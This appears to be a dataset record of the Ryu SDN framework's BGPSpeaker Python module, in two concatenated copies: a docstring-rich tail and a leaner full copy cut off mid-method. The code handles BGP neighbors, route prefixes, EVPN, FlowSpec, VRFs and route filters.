all = PrefixFilter('0.0.0.0/0',
policy=PrefixFilter.POLICY_DENY)
pList = [p, all]
self.bgpspeaker.out_filter_set(neighbor_address, pList)
.. Note::
            The out-filter evaluates paths in the order of the Filters in pList.
"""
self._set_filter('out', address, filters)
def out_filter_get(self, address):
""" This method gets out-filter setting from the specified neighbor.
``address`` specifies the IP address of the peer.
Returns a list object containing an instance of Filter sub-class
"""
func_name = 'neighbor.out_filter.get'
param = {
neighbors.IP_ADDRESS: address,
}
return call(func_name, **param)
def in_filter_set(self, address, filters):
"""This method sets in-bound filters to a neighbor.
``address`` specifies the IP address of the neighbor
``filters`` specifies filter list applied before advertised paths are
imported to the global rib. All the items in the list must be an
instance of Filter sub-class.
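        A usage sketch, assuming ``PrefixFilter`` is imported from
        ``ryu.services.protocols.bgp.info_base.base`` and
        ``neighbor_address`` holds the peer's IP address::
            p = PrefixFilter('10.5.111.0/24',
                             policy=PrefixFilter.POLICY_PERMIT)
            speaker.in_filter_set(neighbor_address, [p])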
"""
self._set_filter('in', address, filters)
def in_filter_get(self, address):
"""This method gets in-bound filters of the specified neighbor.
``address`` specifies the IP address of the neighbor.
Returns a list object containing an instance of Filter sub-class
"""
func_name = 'neighbor.in_filter.get'
param = {
neighbors.IP_ADDRESS: address,
}
return call(func_name, **param)
def bmp_server_add(self, address, port):
"""This method registers a new BMP (BGP monitoring Protocol)
server. The BGP speaker starts to send BMP messages to the
server. Currently, only one BMP server can be registered.
``address`` specifies the IP address of a BMP server.
``port`` specifies the listen port number of a BMP server.
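        A usage sketch (the BMP server address and port are
        illustrative)::
            speaker.bmp_server_add('172.17.0.100', 11019)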
"""
func_name = 'bmp.start'
param = {
'host': address,
'port': port,
}
call(func_name, **param)
def bmp_server_del(self, address, port):
""" This method unregister the registered BMP server.
``address`` specifies the IP address of a BMP server.
``port`` specifies the listen port number of a BMP server.
"""
func_name = 'bmp.stop'
param = {
'host': address,
'port': port,
}
call(func_name, **param)
def attribute_map_set(self, address, attribute_maps,
route_dist=None, route_family=RF_VPN_V4):
"""This method sets attribute mapping to a neighbor.
        Attribute mapping can be used when you want to apply an
        attribute to a BGPUpdate message under specific conditions.
``address`` specifies the IP address of the neighbor
        ``attribute_maps`` specifies the attribute_map list that is used
        before paths are advertised. All the items in the list must
        be instances of the AttributeMap class.
``route_dist`` specifies route dist in which attribute_maps
are added.
``route_family`` specifies route family of the VRF.
This parameter must be one of the following.
- RF_VPN_V4 (default) = 'ipv4'
- RF_VPN_V6 = 'ipv6'
We can set AttributeMap to a neighbor as follows::
pref_filter = PrefixFilter('192.168.103.0/30',
PrefixFilter.POLICY_PERMIT)
attribute_map = AttributeMap([pref_filter],
AttributeMap.ATTR_LOCAL_PREF, 250)
speaker.attribute_map_set('192.168.50.102', [attribute_map])
"""
if route_family not in SUPPORTED_VRF_RF:
raise ValueError('Unsupported route_family: %s' % route_family)
func_name = 'neighbor.attribute_map.set'
param = {
neighbors.IP_ADDRESS: address,
neighbors.ATTRIBUTE_MAP: attribute_maps,
}
if route_dist is not None:
param[vrfs.ROUTE_DISTINGUISHER] = route_dist
param[vrfs.VRF_RF] = route_family
call(func_name, **param)
def attribute_map_get(self, address, route_dist=None,
route_family=RF_VPN_V4):
"""This method gets in-bound filters of the specified neighbor.
``address`` specifies the IP address of the neighbor.
``route_dist`` specifies route distinguisher that has attribute_maps.
``route_family`` specifies route family of the VRF.
This parameter must be one of the following.
- RF_VPN_V4 (default) = 'ipv4'
- RF_VPN_V6 = 'ipv6'
Returns a list object containing an instance of AttributeMap
"""
if route_family not in SUPPORTED_VRF_RF:
raise ValueError('Unsupported route_family: %s' % route_family)
func_name = 'neighbor.attribute_map.get'
param = {
neighbors.IP_ADDRESS: address,
}
if route_dist is not None:
param[vrfs.ROUTE_DISTINGUISHER] = route_dist
param[vrfs.VRF_RF] = route_family
return call(func_name, **param)
@staticmethod
def _check_rf_and_normalize(prefix):
""" check prefix's route_family and if the address is
IPv6 address, return IPv6 route_family and normalized IPv6 address.
If the address is IPv4 address, return IPv4 route_family
and the prefix itself.
"""
ip, masklen = prefix.split('/')
if netaddr.valid_ipv6(ip):
# normalize IPv6 address
ipv6_prefix = str(netaddr.IPAddress(ip)) + '/' + masklen
return vrfs.VRF_RF_IPV6, ipv6_prefix
else:
return vrfs.VRF_RF_IPV4, prefix
| 38.428467 | 87 | 0.637757 |
import netaddr
from ryu.lib import hub
from ryu.lib.packet.bgp import (
BGPFlowSpecTrafficActionCommunity,
BGPFlowSpecVlanActionCommunity,
BGPFlowSpecTPIDActionCommunity,
)
from ryu.services.protocols.bgp.core_manager import CORE_MANAGER
from ryu.services.protocols.bgp.signals.emit import BgpSignalBus
from ryu.services.protocols.bgp.api.base import call
from ryu.services.protocols.bgp.api.base import PREFIX
from ryu.services.protocols.bgp.api.base import EVPN_ROUTE_TYPE
from ryu.services.protocols.bgp.api.base import EVPN_ESI
from ryu.services.protocols.bgp.api.base import EVPN_ETHERNET_TAG_ID
from ryu.services.protocols.bgp.api.base import REDUNDANCY_MODE
from ryu.services.protocols.bgp.api.base import IP_ADDR
from ryu.services.protocols.bgp.api.base import MAC_ADDR
from ryu.services.protocols.bgp.api.base import NEXT_HOP
from ryu.services.protocols.bgp.api.base import IP_PREFIX
from ryu.services.protocols.bgp.api.base import GW_IP_ADDR
from ryu.services.protocols.bgp.api.base import ROUTE_DISTINGUISHER
from ryu.services.protocols.bgp.api.base import ROUTE_FAMILY
from ryu.services.protocols.bgp.api.base import EVPN_VNI
from ryu.services.protocols.bgp.api.base import TUNNEL_TYPE
from ryu.services.protocols.bgp.api.base import PMSI_TUNNEL_TYPE
from ryu.services.protocols.bgp.api.prefix import EVPN_MAX_ET
from ryu.services.protocols.bgp.api.prefix import ESI_TYPE_LACP
from ryu.services.protocols.bgp.api.prefix import ESI_TYPE_L2_BRIDGE
from ryu.services.protocols.bgp.api.prefix import ESI_TYPE_MAC_BASED
from ryu.services.protocols.bgp.api.prefix import EVPN_ETH_AUTO_DISCOVERY
from ryu.services.protocols.bgp.api.prefix import EVPN_MAC_IP_ADV_ROUTE
from ryu.services.protocols.bgp.api.prefix import EVPN_MULTICAST_ETAG_ROUTE
from ryu.services.protocols.bgp.api.prefix import EVPN_ETH_SEGMENT
from ryu.services.protocols.bgp.api.prefix import EVPN_IP_PREFIX_ROUTE
from ryu.services.protocols.bgp.api.prefix import REDUNDANCY_MODE_ALL_ACTIVE
from ryu.services.protocols.bgp.api.prefix import REDUNDANCY_MODE_SINGLE_ACTIVE
from ryu.services.protocols.bgp.api.prefix import TUNNEL_TYPE_VXLAN
from ryu.services.protocols.bgp.api.prefix import TUNNEL_TYPE_NVGRE
from ryu.services.protocols.bgp.api.prefix import (
PMSI_TYPE_NO_TUNNEL_INFO,
PMSI_TYPE_INGRESS_REP)
from ryu.services.protocols.bgp.api.prefix import (
FLOWSPEC_FAMILY,
FLOWSPEC_FAMILY_IPV4,
FLOWSPEC_FAMILY_VPNV4,
FLOWSPEC_FAMILY_IPV6,
FLOWSPEC_FAMILY_VPNV6,
FLOWSPEC_FAMILY_L2VPN,
FLOWSPEC_RULES,
FLOWSPEC_ACTIONS)
from ryu.services.protocols.bgp.rtconf.common import LOCAL_AS
from ryu.services.protocols.bgp.rtconf.common import ROUTER_ID
from ryu.services.protocols.bgp.rtconf.common import CLUSTER_ID
from ryu.services.protocols.bgp.rtconf.common import BGP_SERVER_HOSTS
from ryu.services.protocols.bgp.rtconf.common import BGP_SERVER_PORT
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_BGP_SERVER_HOSTS
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_BGP_SERVER_PORT
from ryu.services.protocols.bgp.rtconf.common import (
DEFAULT_REFRESH_MAX_EOR_TIME, DEFAULT_REFRESH_STALEPATH_TIME)
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_LABEL_RANGE
from ryu.services.protocols.bgp.rtconf.common import REFRESH_MAX_EOR_TIME
from ryu.services.protocols.bgp.rtconf.common import REFRESH_STALEPATH_TIME
from ryu.services.protocols.bgp.rtconf.common import LABEL_RANGE
from ryu.services.protocols.bgp.rtconf.common import ALLOW_LOCAL_AS_IN_COUNT
from ryu.services.protocols.bgp.rtconf.common import LOCAL_PREF
from ryu.services.protocols.bgp.rtconf.common import DEFAULT_LOCAL_PREF
from ryu.services.protocols.bgp.rtconf import neighbors
from ryu.services.protocols.bgp.rtconf import vrfs
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV4
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV6
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV4
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV6
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_EVPN
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV4FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_IPV6FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV4FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_VPNV6FS
from ryu.services.protocols.bgp.rtconf.base import CAP_MBGP_L2VPNFS
from ryu.services.protocols.bgp.rtconf.base import CAP_ENHANCED_REFRESH
from ryu.services.protocols.bgp.rtconf.base import CAP_FOUR_OCTET_AS_NUMBER
from ryu.services.protocols.bgp.rtconf.base import HOLD_TIME
from ryu.services.protocols.bgp.rtconf.base import MULTI_EXIT_DISC
from ryu.services.protocols.bgp.rtconf.base import SITE_OF_ORIGINS
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_CAP_MBGP_IPV4,
DEFAULT_CAP_MBGP_IPV6,
DEFAULT_CAP_MBGP_VPNV4,
DEFAULT_CAP_MBGP_VPNV6,
DEFAULT_CAP_MBGP_EVPN,
DEFAULT_CAP_MBGP_IPV4FS,
DEFAULT_CAP_MBGP_IPV6FS,
DEFAULT_CAP_MBGP_VPNV4FS,
DEFAULT_CAP_MBGP_VPNV6FS,
DEFAULT_CAP_MBGP_L2VPNFS,
DEFAULT_HOLD_TIME,
)
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_CAP_ENHANCED_REFRESH, DEFAULT_CAP_FOUR_OCTET_AS_NUMBER)
from ryu.services.protocols.bgp.rtconf.neighbors import DEFAULT_CONNECT_MODE
from ryu.services.protocols.bgp.rtconf.neighbors import PEER_NEXT_HOP
from ryu.services.protocols.bgp.rtconf.neighbors import PASSWORD
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_IS_ROUTE_SERVER_CLIENT, IS_ROUTE_SERVER_CLIENT)
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_IS_ROUTE_REFLECTOR_CLIENT, IS_ROUTE_REFLECTOR_CLIENT)
from ryu.services.protocols.bgp.rtconf.neighbors import (
DEFAULT_IS_NEXT_HOP_SELF, IS_NEXT_HOP_SELF)
from ryu.services.protocols.bgp.rtconf.neighbors import CONNECT_MODE
from ryu.services.protocols.bgp.rtconf.neighbors import LOCAL_ADDRESS
from ryu.services.protocols.bgp.rtconf.neighbors import LOCAL_PORT
from ryu.services.protocols.bgp.rtconf.vrfs import SUPPORTED_VRF_RF
from ryu.services.protocols.bgp.info_base.base import Filter
from ryu.services.protocols.bgp.info_base.ipv4 import Ipv4Path
from ryu.services.protocols.bgp.info_base.ipv6 import Ipv6Path
from ryu.services.protocols.bgp.info_base.vpnv4 import Vpnv4Path
from ryu.services.protocols.bgp.info_base.vpnv6 import Vpnv6Path
from ryu.services.protocols.bgp.info_base.evpn import EvpnPath
NEIGHBOR_CONF_MED = MULTI_EXIT_DISC
RF_VPN_V4 = vrfs.VRF_RF_IPV4
RF_VPN_V6 = vrfs.VRF_RF_IPV6
RF_L2_EVPN = vrfs.VRF_RF_L2_EVPN
RF_VPNV4_FLOWSPEC = vrfs.VRF_RF_IPV4_FLOWSPEC
RF_VPNV6_FLOWSPEC = vrfs.VRF_RF_IPV6_FLOWSPEC
RF_L2VPN_FLOWSPEC = vrfs.VRF_RF_L2VPN_FLOWSPEC
FLOWSPEC_TA_SAMPLE = BGPFlowSpecTrafficActionCommunity.SAMPLE
FLOWSPEC_TA_TERMINAL = BGPFlowSpecTrafficActionCommunity.TERMINAL
FLOWSPEC_VLAN_POP = BGPFlowSpecVlanActionCommunity.POP
FLOWSPEC_VLAN_PUSH = BGPFlowSpecVlanActionCommunity.PUSH
FLOWSPEC_VLAN_SWAP = BGPFlowSpecVlanActionCommunity.SWAP
FLOWSPEC_VLAN_RW_INNER = BGPFlowSpecVlanActionCommunity.REWRITE_INNER
FLOWSPEC_VLAN_RW_OUTER = BGPFlowSpecVlanActionCommunity.REWRITE_OUTER
FLOWSPEC_TPID_TI = BGPFlowSpecTPIDActionCommunity.TI
FLOWSPEC_TPID_TO = BGPFlowSpecTPIDActionCommunity.TO
class EventPrefix(object):
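    # Wraps a path from the local RIB for delivery to the registered
    # best_path_change_handler, along with whether the path is being
    # advertised or withdrawn.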
def __init__(self, path, is_withdraw):
self.path = path
self.is_withdraw = is_withdraw
@property
def remote_as(self):
return self.path.source.remote_as
@property
def route_dist(self):
if (isinstance(self.path, Vpnv4Path)
or isinstance(self.path, Vpnv6Path)
or isinstance(self.path, EvpnPath)):
return self.path.nlri.route_dist
else:
return None
@property
def prefix(self):
if isinstance(self.path, Ipv4Path) or isinstance(self.path, Ipv6Path):
return self.path.nlri.addr + '/' + str(self.path.nlri.length)
elif (isinstance(self.path, Vpnv4Path)
or isinstance(self.path, Vpnv6Path)
or isinstance(self.path, EvpnPath)):
return self.path.nlri.prefix
else:
return None
@property
def nexthop(self):
return self.path.nexthop
@property
def label(self):
if (isinstance(self.path, Vpnv4Path)
or isinstance(self.path, Vpnv6Path)
or isinstance(self.path, EvpnPath)):
return getattr(self.path.nlri, 'label_list', None)
else:
return None
class BGPSpeaker(object):
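    # Facade over the BGP core service: configuration changes and route
    # updates are forwarded to it through the internal 'call' API.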
def __init__(self, as_number, router_id,
bgp_server_hosts=DEFAULT_BGP_SERVER_HOSTS,
bgp_server_port=DEFAULT_BGP_SERVER_PORT,
refresh_stalepath_time=DEFAULT_REFRESH_STALEPATH_TIME,
refresh_max_eor_time=DEFAULT_REFRESH_MAX_EOR_TIME,
best_path_change_handler=None,
peer_down_handler=None,
peer_up_handler=None,
ssh_console=False,
ssh_port=None, ssh_host=None, ssh_host_key=None,
label_range=DEFAULT_LABEL_RANGE,
allow_local_as_in_count=0,
cluster_id=None,
local_pref=DEFAULT_LOCAL_PREF):
super(BGPSpeaker, self).__init__()
settings = {
LOCAL_AS: as_number,
ROUTER_ID: router_id,
BGP_SERVER_HOSTS: bgp_server_hosts,
BGP_SERVER_PORT: bgp_server_port,
REFRESH_STALEPATH_TIME: refresh_stalepath_time,
REFRESH_MAX_EOR_TIME: refresh_max_eor_time,
LABEL_RANGE: label_range,
ALLOW_LOCAL_AS_IN_COUNT: allow_local_as_in_count,
CLUSTER_ID: cluster_id,
LOCAL_PREF: local_pref,
}
self._core_start(settings)
self._init_signal_listeners()
self._best_path_change_handler = best_path_change_handler
self._peer_down_handler = peer_down_handler
self._peer_up_handler = peer_up_handler
if ssh_console:
from ryu.services.protocols.bgp.operator import ssh
ssh_settings = {
ssh.SSH_PORT: ssh_port or ssh.DEFAULT_SSH_PORT,
ssh.SSH_HOST: ssh_host or ssh.DEFAULT_SSH_HOST,
ssh.SSH_HOST_KEY: ssh_host_key or ssh.DEFAULT_SSH_HOST_KEY,
}
hub.spawn(ssh.SSH_CLI_CONTROLLER.start, **ssh_settings)
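    # Example usage (sketch; addresses and AS numbers are illustrative):
    #
    #   def dump(ev):
    #       print(ev.prefix, ev.nexthop, ev.is_withdraw)
    #
    #   speaker = BGPSpeaker(as_number=64512, router_id='10.0.0.1',
    #                        best_path_change_handler=dump)
    #   speaker.neighbor_add('192.0.2.1', remote_as=64513)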
def _notify_peer_down(self, peer):
remote_ip = peer.ip_address
remote_as = peer.remote_as
if self._peer_down_handler:
self._peer_down_handler(remote_ip, remote_as)
def _notify_peer_up(self, peer):
remote_ip = peer.ip_address
remote_as = peer.remote_as
if self._peer_up_handler:
self._peer_up_handler(remote_ip, remote_as)
def _notify_best_path_changed(self, path, is_withdraw):
if (not path.source
or not isinstance(path, (Ipv4Path, Ipv6Path,
Vpnv4Path, Vpnv6Path, EvpnPath))):
return
ev = EventPrefix(path, is_withdraw)
if self._best_path_change_handler:
self._best_path_change_handler(ev)
def _init_signal_listeners(self):
CORE_MANAGER.get_core_service()._signal_bus.register_listener(
BgpSignalBus.BGP_BEST_PATH_CHANGED,
lambda _, info:
self._notify_best_path_changed(info['path'],
info['is_withdraw'])
)
CORE_MANAGER.get_core_service()._signal_bus.register_listener(
BgpSignalBus.BGP_ADJ_DOWN,
lambda _, info:
self._notify_peer_down(info['peer'])
)
CORE_MANAGER.get_core_service()._signal_bus.register_listener(
BgpSignalBus.BGP_ADJ_UP,
lambda _, info:
self._notify_peer_up(info['peer'])
)
def _core_start(self, settings):
waiter = hub.Event()
call('core.start', waiter=waiter, **settings)
waiter.wait()
def _serve_forever(self):
pass
def shutdown(self):
call('core.stop')
def neighbor_add(self, address, remote_as,
enable_ipv4=DEFAULT_CAP_MBGP_IPV4,
enable_ipv6=DEFAULT_CAP_MBGP_IPV6,
enable_vpnv4=DEFAULT_CAP_MBGP_VPNV4,
enable_vpnv6=DEFAULT_CAP_MBGP_VPNV6,
enable_evpn=DEFAULT_CAP_MBGP_EVPN,
enable_ipv4fs=DEFAULT_CAP_MBGP_IPV4FS,
enable_ipv6fs=DEFAULT_CAP_MBGP_IPV6FS,
enable_vpnv4fs=DEFAULT_CAP_MBGP_VPNV4FS,
enable_vpnv6fs=DEFAULT_CAP_MBGP_VPNV6FS,
enable_l2vpnfs=DEFAULT_CAP_MBGP_L2VPNFS,
enable_enhanced_refresh=DEFAULT_CAP_ENHANCED_REFRESH,
enable_four_octet_as_number=DEFAULT_CAP_FOUR_OCTET_AS_NUMBER,
next_hop=None, password=None, multi_exit_disc=None,
site_of_origins=None,
is_route_server_client=DEFAULT_IS_ROUTE_SERVER_CLIENT,
is_route_reflector_client=DEFAULT_IS_ROUTE_REFLECTOR_CLIENT,
is_next_hop_self=DEFAULT_IS_NEXT_HOP_SELF,
local_address=None,
local_port=None, local_as=None,
connect_mode=DEFAULT_CONNECT_MODE,
hold_time=DEFAULT_HOLD_TIME):
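        # Registers a new peer. The enable_* flags choose which MP-BGP and
        # FlowSpec capabilities are advertised; optional attributes (MED,
        # site-of-origin, local address/port/AS) are only passed through
        # when explicitly given.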
bgp_neighbor = {
neighbors.IP_ADDRESS: address,
neighbors.REMOTE_AS: remote_as,
PEER_NEXT_HOP: next_hop,
PASSWORD: password,
IS_ROUTE_SERVER_CLIENT: is_route_server_client,
IS_ROUTE_REFLECTOR_CLIENT: is_route_reflector_client,
IS_NEXT_HOP_SELF: is_next_hop_self,
CONNECT_MODE: connect_mode,
CAP_ENHANCED_REFRESH: enable_enhanced_refresh,
CAP_FOUR_OCTET_AS_NUMBER: enable_four_octet_as_number,
CAP_MBGP_IPV4: enable_ipv4,
CAP_MBGP_IPV6: enable_ipv6,
CAP_MBGP_VPNV4: enable_vpnv4,
CAP_MBGP_VPNV6: enable_vpnv6,
CAP_MBGP_EVPN: enable_evpn,
CAP_MBGP_IPV4FS: enable_ipv4fs,
CAP_MBGP_IPV6FS: enable_ipv6fs,
CAP_MBGP_VPNV4FS: enable_vpnv4fs,
CAP_MBGP_VPNV6FS: enable_vpnv6fs,
CAP_MBGP_L2VPNFS: enable_l2vpnfs,
HOLD_TIME: hold_time,
}
if multi_exit_disc:
bgp_neighbor[MULTI_EXIT_DISC] = multi_exit_disc
if site_of_origins:
bgp_neighbor[SITE_OF_ORIGINS] = site_of_origins
if local_address:
bgp_neighbor[LOCAL_ADDRESS] = local_address
if local_port:
bgp_neighbor[LOCAL_PORT] = local_port
if local_as:
bgp_neighbor[LOCAL_AS] = local_as
call('neighbor.create', **bgp_neighbor)
def neighbor_del(self, address):
bgp_neighbor = {
neighbors.IP_ADDRESS: address,
}
call('neighbor.delete', **bgp_neighbor)
def neighbor_reset(self, address):
bgp_neighbor = {
neighbors.IP_ADDRESS: address,
}
call('core.reset_neighbor', **bgp_neighbor)
def neighbor_update(self, address, conf_type, conf_value):
assert conf_type == MULTI_EXIT_DISC or conf_type == CONNECT_MODE
func_name = 'neighbor.update'
attribute_param = {}
if conf_type == MULTI_EXIT_DISC:
attribute_param = {neighbors.MULTI_EXIT_DISC: conf_value}
elif conf_type == CONNECT_MODE:
attribute_param = {neighbors.CONNECT_MODE: conf_value}
param = {neighbors.IP_ADDRESS: address,
neighbors.CHANGES: attribute_param}
call(func_name, **param)
def neighbor_state_get(self, address=None, format='json'):
show = {
'params': ['neighbor', 'summary'],
'format': format,
}
if address:
show['params'].append(address)
return call('operator.show', **show)
def prefix_add(self, prefix, next_hop=None, route_dist=None):
func_name = 'network.add'
networks = {
PREFIX: prefix,
}
if next_hop:
networks[NEXT_HOP] = next_hop
if route_dist:
func_name = 'prefix.add_local'
networks[ROUTE_DISTINGUISHER] = route_dist
rf, p = self._check_rf_and_normalize(prefix)
networks[ROUTE_FAMILY] = rf
networks[PREFIX] = p
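            # An IPv6 VRF route cannot carry a plain IPv4 next hop, so it
            # is rewritten as the IPv4-mapped IPv6 address (::ffff:a.b.c.d).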
if rf == vrfs.VRF_RF_IPV6 and netaddr.valid_ipv4(next_hop):
networks[NEXT_HOP] = \
str(netaddr.IPAddress(next_hop).ipv6())
return call(func_name, **networks)
def prefix_del(self, prefix, route_dist=None):
func_name = 'network.del'
networks = {
PREFIX: prefix,
}
if route_dist:
func_name = 'prefix.delete_local'
networks[ROUTE_DISTINGUISHER] = route_dist
rf, p = self._check_rf_and_normalize(prefix)
networks[ROUTE_FAMILY] = rf
networks[PREFIX] = p
call(func_name, **networks)
def evpn_prefix_add(self, route_type, route_dist, esi=0,
ethernet_tag_id=None, mac_addr=None, ip_addr=None,
ip_prefix=None, gw_ip_addr=None, vni=None,
next_hop=None, tunnel_type=None, pmsi_tunnel_type=None,
redundancy_mode=None):
func_name = 'evpn_prefix.add_local'
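        # A zero next hop (the default) conventionally marks the route as
        # locally originated.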
if not next_hop:
next_hop = '0.0.0.0'
kwargs = {EVPN_ROUTE_TYPE: route_type,
ROUTE_DISTINGUISHER: route_dist,
NEXT_HOP: next_hop}
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[TUNNEL_TYPE] = tunnel_type
elif tunnel_type is not None:
raise ValueError('Unsupported tunnel type: %s' % tunnel_type)
if route_type == EVPN_ETH_AUTO_DISCOVERY:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
})
if vni is not None:
kwargs[EVPN_VNI] = vni
if redundancy_mode in [
REDUNDANCY_MODE_ALL_ACTIVE,
REDUNDANCY_MODE_SINGLE_ACTIVE]:
kwargs[REDUNDANCY_MODE] = redundancy_mode
elif redundancy_mode is not None:
raise ValueError('Unsupported Redundancy Mode: %s' %
redundancy_mode)
elif route_type == EVPN_MAC_IP_ADV_ROUTE:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
MAC_ADDR: mac_addr,
IP_ADDR: ip_addr,
})
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[EVPN_VNI] = vni
elif route_type == EVPN_MULTICAST_ETAG_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_ADDR: ip_addr,
})
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[EVPN_VNI] = vni
if pmsi_tunnel_type in [
PMSI_TYPE_NO_TUNNEL_INFO,
PMSI_TYPE_INGRESS_REP]:
kwargs[PMSI_TUNNEL_TYPE] = pmsi_tunnel_type
elif pmsi_tunnel_type is not None:
raise ValueError('Unsupported PMSI tunnel type: %s' %
pmsi_tunnel_type)
elif route_type == EVPN_ETH_SEGMENT:
kwargs.update({
EVPN_ESI: esi,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_IP_PREFIX_ROUTE:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_PREFIX: ip_prefix,
GW_IP_ADDR: gw_ip_addr,
})
if tunnel_type in [TUNNEL_TYPE_VXLAN, TUNNEL_TYPE_NVGRE]:
kwargs[EVPN_VNI] = vni
else:
raise ValueError('Unsupported EVPN route type: %s' % route_type)
call(func_name, **kwargs)
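    # Example (sketch; the RD, MAC/IP and VNI values are illustrative):
    #
    #   speaker.evpn_prefix_add(route_type=EVPN_MAC_IP_ADV_ROUTE,
    #                           route_dist='65000:100', esi=0,
    #                           ethernet_tag_id=0,
    #                           mac_addr='aa:bb:cc:dd:ee:ff',
    #                           ip_addr='10.0.0.1', next_hop='172.16.0.1',
    #                           tunnel_type=TUNNEL_TYPE_VXLAN, vni=5000)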
def evpn_prefix_del(self, route_type, route_dist, esi=0,
ethernet_tag_id=None, mac_addr=None, ip_addr=None,
ip_prefix=None):
func_name = 'evpn_prefix.delete_local'
kwargs = {EVPN_ROUTE_TYPE: route_type,
ROUTE_DISTINGUISHER: route_dist}
if route_type == EVPN_ETH_AUTO_DISCOVERY:
kwargs.update({
EVPN_ESI: esi,
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
})
elif route_type == EVPN_MAC_IP_ADV_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
MAC_ADDR: mac_addr,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_MULTICAST_ETAG_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_ETH_SEGMENT:
kwargs.update({
EVPN_ESI: esi,
IP_ADDR: ip_addr,
})
elif route_type == EVPN_IP_PREFIX_ROUTE:
kwargs.update({
EVPN_ETHERNET_TAG_ID: ethernet_tag_id,
IP_PREFIX: ip_prefix,
})
else:
raise ValueError('Unsupported EVPN route type: %s' % route_type)
call(func_name, **kwargs)
def flowspec_prefix_add(self, flowspec_family, rules, route_dist=None,
actions=None):
func_name = 'flowspec.add'
kwargs = {
FLOWSPEC_FAMILY: flowspec_family,
FLOWSPEC_RULES: rules,
FLOWSPEC_ACTIONS: actions or {},
}
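        # VPN FlowSpec families are installed into a VRF, so they go through
        # the *_local API together with the route distinguisher.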
if flowspec_family in [FLOWSPEC_FAMILY_VPNV4, FLOWSPEC_FAMILY_VPNV6,
FLOWSPEC_FAMILY_L2VPN]:
func_name = 'flowspec.add_local'
kwargs.update({ROUTE_DISTINGUISHER: route_dist})
call(func_name, **kwargs)
def flowspec_prefix_del(self, flowspec_family, rules, route_dist=None):
func_name = 'flowspec.del'
kwargs = {
FLOWSPEC_FAMILY: flowspec_family,
FLOWSPEC_RULES: rules,
}
if flowspec_family in [FLOWSPEC_FAMILY_VPNV4, FLOWSPEC_FAMILY_VPNV6,
FLOWSPEC_FAMILY_L2VPN]:
func_name = 'flowspec.del_local'
kwargs.update({ROUTE_DISTINGUISHER: route_dist})
call(func_name, **kwargs)
def vrf_add(self, route_dist, import_rts, export_rts, site_of_origins=None,
route_family=RF_VPN_V4, multi_exit_disc=None):
if route_family not in SUPPORTED_VRF_RF:
raise ValueError('Unsupported route_family: %s' % route_family)
vrf = {
vrfs.ROUTE_DISTINGUISHER: route_dist,
vrfs.IMPORT_RTS: import_rts,
vrfs.EXPORT_RTS: export_rts,
vrfs.SITE_OF_ORIGINS: site_of_origins,
vrfs.VRF_RF: route_family,
vrfs.MULTI_EXIT_DISC: multi_exit_disc,
}
call('vrf.create', **vrf)
def vrf_del(self, route_dist):
vrf = {vrfs.ROUTE_DISTINGUISHER: route_dist}
call('vrf.delete', **vrf)
def vrfs_get(self, subcommand='routes', route_dist=None,
route_family='all', format='json'):
show = {
'format': format,
}
if route_family in SUPPORTED_VRF_RF:
assert route_dist is not None
show['params'] = ['vrf', subcommand, route_dist, route_family]
else:
show['params'] = ['vrf', subcommand, 'all']
return call('operator.show', **show)
def rib_get(self, family='all', format='json'):
show = {
'params': ['rib', family],
'format': format
}
return call('operator.show', **show)
def neighbor_get(self, route_type, address, format='json'):
show = {
'format': format,
}
if route_type == 'sent-routes' or route_type == 'received-routes':
show['params'] = ['neighbor', route_type, address, 'all']
else:
show['params'] = ['neighbor', 'received-routes', address, 'all']
return call('operator.show', **show)
def neighbors_get(self, format='json'):
show = {
'params': ['neighbor'],
'format': format,
}
return call('operator.show', **show)
    def _set_filter(self, filter_type, address, filters):
        assert filter_type in ('in', 'out'), (
            "filter type must be 'in' or 'out'")
        # Normalize before validating: iterating over None in the assert
        # below would raise TypeError instead of treating it as 'no filters'.
        if filters is None:
            filters = []
        assert all(isinstance(f, Filter) for f in filters), (
            'all the items in filters must be an instance of Filter sub-class')
func_name = 'neighbor.' + filter_type + '_filter.set'
param = {
neighbors.IP_ADDRESS: address,
}
if filter_type == 'in':
param[neighbors.IN_FILTER] = filters
else:
param[neighbors.OUT_FILTER] = filters
call(func_name, **param)
def out_filter_set(self, address, filters):
self._set_filter('out', address, filters)
def out_filter_get(self, address):
func_name = 'neighbor.out_filter.get'
param = {
neighbors.IP_ADDRESS: address,
}
return call(func_name, **param)
def in_filter_set(self, address, filters):
self._set_filter('in', address, filters)
def in_filter_get(self, address):
func_name = 'neighbor.in_filter.get'
param = {
neighbors.IP_ADDRESS: address,
}
return call(func_name, **param)
def bmp_server_add(self, address, port):
func_name = 'bmp.start'
param = {
